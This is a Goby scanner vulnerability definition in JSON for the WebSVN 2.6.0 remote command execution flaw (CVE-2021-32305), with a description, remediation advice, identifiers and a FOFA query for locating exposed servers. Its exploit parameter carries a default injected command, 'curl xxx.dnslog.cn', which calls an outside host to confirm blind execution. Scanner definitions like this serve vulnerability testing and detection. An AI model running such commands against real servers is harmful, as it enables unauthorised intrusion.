qwqdanchun
/
Goby
mirror of https://github.com/qwqdanchun/Goby.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
Goby/json/Websvn-2.6.0-RCE-(CVE-2021-...

69 lines
3.7 KiB
JSON
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

{
"Name": "Websvn 2.6.0 RCE (CVE-2021-32305)",
"Description": "<p>websvn is an application software. An online Subversion repository browser.</p><p>WebSVN versions earlier than 2.6.1 have an arbitrary command execution vulnerability. An attacker can execute arbitrary commands through the search parameter to obtain server permissions.</p>",
"Product": "Websvn",
"Homepage": "https://github.com/websvnphp/websvn",
"DisclosureDate": "2021-05-04",
"Author": "1291904552@qq.com",
"FofaQuery": "body=\"./templates/calm/images/favicon.ico\"",
"GobyQuery": "body=\"./templates/calm/images/favicon.ico\"",
"Level": "2",
"Impact": "<p>WebSVN versions earlier than 2.6.1 have an arbitrary command execution vulnerability. An attacker can execute arbitrary commands through the search parameter to obtain server permissions.</p>",
"Recommendation": "<p>The vendor has released a bug fix, please pay attention to the update in time: <a href=\"https://github.com/websvnphp/websvn\">https://github.com/websvnphp/websvn</a></p><p>1. Set access policies and whitelist access through security devices such as firewalls.</p><p>2. If not necessary, prohibit public network access to the system.</p>",
"Translation": {
"CN": {
"Name": "Websvn 应用 2.6.0 版本任意命令执行漏洞CVE-2021-32305",
"VulType": ["命令执行"],
"Tags": ["命令执行"],
"Description": "<p>websvn是一个应用软件。一个在线Subversion存储库浏览器。</p><p>WebSVN 2.6.1之前版本存在任意命令执行漏洞漏洞攻击者通过search参数执行任意命令获取服务器权限。</p>",
"Impact": "<p>WebSVN 2.6.1之前版本存在任意命令执行漏洞漏洞攻击者通过search参数执行任意命令获取服务器权限。</p>",
"Product": "Websvn",
"Recommendation": "<p>⼚商已发布了漏洞修复程序,请及时关注更新:<a href=\"https://github.com/websvnphp/websvn\">https://github.com/websvnphp/websvn</a></p><p>1、通过防⽕墙等安全设备设置访问策略设置⽩名单访问。</p><p>2、如⾮必要禁⽌公⽹访问该系统。</p>"
},
"EN": {
"Name": "Websvn 2.6.0 RCE (CVE-2021-32305)",
"VulType": ["rce"],
"Tags": ["rce"],
"Description": "<p>websvn is an application software. An online Subversion repository browser.</p><p>WebSVN versions earlier than 2.6.1 have an arbitrary command execution vulnerability. An attacker can execute arbitrary commands through the search parameter to obtain server permissions.</p>",
"Impact": "<p>WebSVN versions earlier than 2.6.1 have an arbitrary command execution vulnerability. An attacker can execute arbitrary commands through the search parameter to obtain server permissions.</p>",
"Product": "Websvn",
"Recommendation": "<p>The vendor has released a bug fix, please pay attention to the update in time: <a href=\"https://github.com/websvnphp/websvn\">https://github.com/websvnphp/websvn</a></p><p>1. Set access policies and whitelist access through security devices such as firewalls.</p><p>2.If not necessary, prohibit public network access to the system.</p>"
}
},
"References": [
"http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202105-1210"
],
"HasExp": true,
"ExpParams": [
{
"name": "cmd",
"type": "input",
"value": "curl xxx.dnslog.cn"
}
],
"ExpTips": null,
"ScanSteps": null,
"Tags": [
"rce"
],
"VulType": [
"rce"
],
"CVEIDs": [
"CVE-2021-32305"
],
"CVSSScore": "9.0",
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
},
"CNNVD": [
"CNNVD-202105-1210"
],
"CNVD": [
""
]
}
Reference in New Issue View Git Blame Copy Permalink